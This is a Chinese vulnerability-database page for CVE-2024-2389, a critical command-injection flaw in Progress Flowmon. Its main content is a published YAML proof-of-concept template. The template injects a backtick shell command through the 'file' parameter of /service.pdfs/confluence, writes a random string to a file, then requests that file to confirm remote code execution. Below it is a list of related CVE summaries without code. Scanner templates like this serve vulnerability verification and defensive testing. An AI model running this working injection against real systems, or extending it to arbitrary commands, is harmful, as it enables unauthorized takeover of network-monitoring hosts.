CVE-2024-2389: Progress Flowmon rce

漏洞描述

PoC代码[已公开]

id: CVE-2024-2389
info:
  name: Progress Flowmon rce
  author: laohuan12138
  severity: critical
  verified: true
  description: Progress Flowmon 11.1.14之前的11.x版本和12.3.5之前的12.x版本存在命令执行漏洞，可执行系统命令获取主机权限。
  references:
    - https://mp.weixin.qq.com/s/-_SSnuJ5eWw1xbAdGG5tvg

  tags: cve,rce,cve2024
  created: 2024/4/17

set: 
  filename: randomLowercase(6)
  randstr: randomLowercase(10)

rules:
  r0:
    request:
      method: GET
      path: /service.pdfs/confluence?lang=en&file=`echo+"{{randstr}}">{{filename}}.txt`
    expression: response.status == 403

  r1:
    request:
      method: GET
      path: /{{filename}}.txt
    expression: response.status == 200 && response.body.bcontains(bytes(randstr))

expression: r0() && r1()

  

相关漏洞推荐

• Progress Flowmon CVE-2024-2389 命令注入漏洞 无POC

  2024-05-09 | Progress Flowmon
  Progress Flowmon是Progress公司的一个实时网络流量监控工具。Progress Flowmon中存在命令注入漏洞，此漏洞是由于程序未充分验证用户输入file参数的数据所导致的。

• Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

  2025-09-19 | Journyx
  Journyx是一个项目和工资单的员工时间跟踪软件，可以轻松且高效地收集员工时间表和费用数据。 Journyx 的soap_cgi.pyc API 处理程序允许 SOAP 请求的 X...

• Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

  2025-09-19 | Whoogle search
  Whoogle search是一个自托管、无广告、尊重隐私的元搜索引擎。Whoogle search v0.9.0 的/models/config.py 中存在一个问题，允许攻击者通过提供精心设计的搜...

• Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425） 无POC

  2025-09-19 | Wordpress WooCommerce Ultimate Gift Card
  WooCommerce Ultimate Gift Card 是 WordPress 平台上的一款用于创建、销售和管理礼品卡的插件。该插件在 mwb_wgm_preview_mail 和 mwb_wg...

• DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833） 无POC

  2025-09-12 | DataCube3
  DataCube3 是日本F-logic公司的一个小型测量终端系统。DataCube3 的/admin/exec.php接口存在SQL注入漏洞，攻击者可获取数据库密码登敏感信息。